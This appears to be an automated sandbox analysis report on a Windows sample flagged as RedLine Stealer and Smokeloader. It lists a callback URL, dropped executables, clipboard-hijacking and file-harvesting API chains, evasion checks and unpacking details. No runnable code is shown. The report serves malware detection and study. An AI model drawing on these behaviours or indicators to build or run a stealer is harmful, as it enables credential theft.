Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEf
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,EntryPoint,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep | 0_2_004016E3
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03011947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep

System Summary

Source: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0301237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03012621 NtdllDefWindowProc_W,PostQuitMessage
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00428042
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004071D0
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004373F9
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004274A4
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0042D50E
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00428580
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_004166CF
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0043D698
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00413745
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00427816
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0040E999
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00427AC0
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00418ACF
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0042EB00
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00436CDF
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00427D87
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00413F2B
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_030382A9
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0303ED67
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03024192
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0303770B
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0303D775
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_030387E7
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03037A7D
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03026936
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_030239AC
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03046F46
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03037FEE
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03037D27
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03028D36
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0303ED67
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0301EC00
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: String function: 00410740 appears 53 times
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: String function: 0040F928 appears 36 times
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: String function: 030209A7 appears 53 times
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: String function: 0040FDD7 appears 125 times
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: String function: 0302003E appears 121 times
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044
Source: mCe4hBfqCT.exe | Binary or memory string: OriginalFileName vs mCe4hBfqCT.exe
Source: mCe4hBfqCT.exe, 00000000.00000003.2070986287.0000000004890000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs mCe4hBfqCT.exe
Source: mCe4hBfqCT.exe, 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs mCe4hBfqCT.exe
Source: mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs mCe4hBfqCT.exe
Source: mCe4hBfqCT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: mCe4hBfqCT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 64A.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@1/3
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D2A26E CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htm
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Mutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5576
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | File created: C:\Users\user\AppData\Local\Temp\64A.tmp
Source: mCe4hBfqCT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mCe4hBfqCT.exe | ReversingLabs: Detection: 39%
Source: mCe4hBfqCT.exe | Virustotal: Detection: 41%
Source: unknown | Process created: C:\Users\user\Desktop\mCe4hBfqCT.exe "C:\Users\user\Desktop\mCe4hBfqCT.exe"
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Process created: C:\Users\user\AppData\Local\Temp\64A.tmp.exe "C:\Users\user\AppData\Local\Temp\64A.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Process created: C:\Users\user\AppData\Local\Temp\64A.tmp.exe "C:\Users\user\AppData\Local\Temp\64A.tmp.exe"
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Unpacked PE file: 0.2.mCe4hBfqCT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.meridu:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Unpacked PE file: 2.2.64A.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.nuhi:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Unpacked PE file: 0.2.mCe4hBfqCT.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Unpacked PE file: 2.2.64A.tmp.exe.400000.1.unpack
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: mCe4hBfqCT.exe | Static PE information: section name: .meridu
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .nuhi
Source: 64A.tmp.exe.0.dr | Static PE information: section name: .nuhi
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00410786 push ecx; ret 0_2_00410799
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D2B0BB push es; iretd 0_2_02D2B0CC
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D2F60D push ecx; ret 0_2_02D2F62A
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D2F48F pushad ; ret 0_2_02D2F4AB
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D2B596 push E8665AC8h; iretd 0_2_02D2B59B
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D2DB51 push FFFFFFADh; ret 0_2_02D2DBC3
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_02D2CE84 push 00000003h; ret 0_2_02D2CE88
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03020018 push ecx; ret 0_2_0302002B
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_030479BF push esp; retf 0_2_030479C7
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_030209ED push ecx; ret 0_2_03020A00
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03047FBD push esp; retf 0_2_03047FBE
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03049E08 pushad ; retf 0_2_03049E0F
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0041B035 push ecx; ret 2_2_0041B048
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040020D pushfd ; iretd 2_2_00400211
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02D1B383 push 7DD07DC0h; iretd 2_2_02D1B394
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02D1E353 push eax; ret 2_2_02D1E371
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02D1E362 push eax; ret 2_2_02D1E371
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02D1A87D pushfd ; iretd 2_2_02D1A880
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F1B29C push ecx; ret 2_2_02F1B2AF
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F00F59 pushfd ; iretd 2_2_02F01078
Source: mCe4hBfqCT.exe | Static PE information: section name: .text entropy: 7.6672496441732925
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.495915274293571
Source: 64A.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.495915274293571
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | File created: C:\Users\user\AppData\Local\Temp\64A.tmp.exe
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E999
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Window / User API: threadDelayed 353
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Window / User API: threadDelayed 9640
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Evaded block: after key decision
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | API coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | API coverage: 6.4 %
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196 | Thread sleep count: 353 > 30
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196 | Thread sleep time: -250983s >= -30000s
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196 | Thread sleep count: 9640 > 30
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196 | Thread sleep time: -6854040s >= -30000s
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00438A12 FindFirstFileExW
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03048C79 FindFirstFileExW
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
